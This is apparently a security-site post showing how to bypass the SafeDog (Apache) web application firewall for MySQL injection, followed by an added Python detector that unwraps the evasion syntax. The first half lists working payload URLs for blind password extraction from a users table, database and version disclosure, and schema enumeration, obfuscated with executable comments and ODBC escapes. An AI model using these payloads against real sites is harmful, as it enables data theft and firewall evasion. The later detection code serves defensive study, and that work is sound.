Prerequisite
The web page has an injection vulnerability
Environment
SafeDog (Apache edition) V4.0 with all protection rules enabled
Bypass
1. Time-based blind injection
https://www.0dayhack.com/test.php?id=2' and if(substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1,sleep(5 ),1)--+
2. Boolean-based blind injection
https://www.0dayhack.com/test.php?id=2' and substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1--+
3. Query the database name / user name
https://www.0dayhack.com/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,(/*!40000database*/()),3)-- -
4. Query the version
https://www.0dayhack.com/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,{/*!f*/version()},3)-- -
5. UNION query
https://www.0dayhack.com/test.php?id=-1'union /*!40000DISTINCT*/(/*!40000select*/1,(select group_concat(column_name) from (information_schema.columns) where table_name='users'),3)-- -
Techniques
1. union select 1,2,3 => union/*!40000DISTINCT*/(/*!40000select*/1,2,3)
2. select password from => select password*1.from user => select password from (user)
3. version() => {/*!f*/version()}
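
Seen from the defending side, rewrites 1 and 3 rely on syntax MySQL unwraps before execution: executable comments (/*!...*/) and the ODBC escape {identifier expr}. The following is an added example, not code from the original post or from SafeDog: a canonicalization step that unwraps both before signature matching. The rule set and the names normalize/detect are hypothetical, and version numbers inside the comments are ignored.

```python
import re
from urllib.parse import unquote_plus

# MySQL executable comment, e.g. /*!40000select*/ or /*!f*/: the body runs as SQL.
EXEC_COMMENT = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# ODBC escape syntax {identifier expr}: MySQL evaluates it as expr.
ODBC_ESCAPE = re.compile(r"\{\s*\w+\s+([^{}]*)\}")

# Hypothetical signature set, written against the canonical form only.
RULES = {
    "union_select": re.compile(r"\bunion\b[\s(]*(?:(?:all|distinct)\b[\s(]*)?select\b"),
    "info_function": re.compile(r"\b(?:database|version|user)\s*\(\s*\)"),
    "time_delay": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\b"),
}

def normalize(value):
    """Approximate the SQL text MySQL sees after comments and escapes are unwrapped."""
    text = unquote_plus(value).lower()
    # Keep the body of executable comments, padded so adjacent tokens do not merge.
    text = EXEC_COMMENT.sub(lambda m: " " + m.group(1) + " ", text)
    # Ordinary comments are dropped by the server, so drop them here too.
    text = PLAIN_COMMENT.sub(" ", text)
    # {identifier expr} collapses to expr.
    text = ODBC_ESCAPE.sub(lambda m: " " + m.group(1) + " ", text)
    return re.sub(r"\s+", " ", text).strip()

def detect(value, canonicalize=True):
    """Return the sorted names of the rules that fire on a parameter value."""
    text = normalize(value) if canonicalize else unquote_plus(value).lower()
    return sorted(name for name, rx in RULES.items() if rx.search(text))

# Inputs: rewritten forms taken from the page's payloads, plus one benign value.
SAMPLES = [
    "union/*!40000DISTINCT*/(/*!40000select*/1,2,3)",
    "(/*!40000database*/())",
    "{/*!f*/version()}",
    "2",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r}: raw={detect(s, False)} canonical={detect(s)}")
```

Matching on the canonical form is a detection aid only; the injection itself is closed by binding id as a query parameter instead of concatenating it into the SQL string.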
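Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided for security research and teaching purposes only. Readers who use this information for other purposes bear all legal and joint liability; this site bears no legal or joint liability. If you have any questions, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).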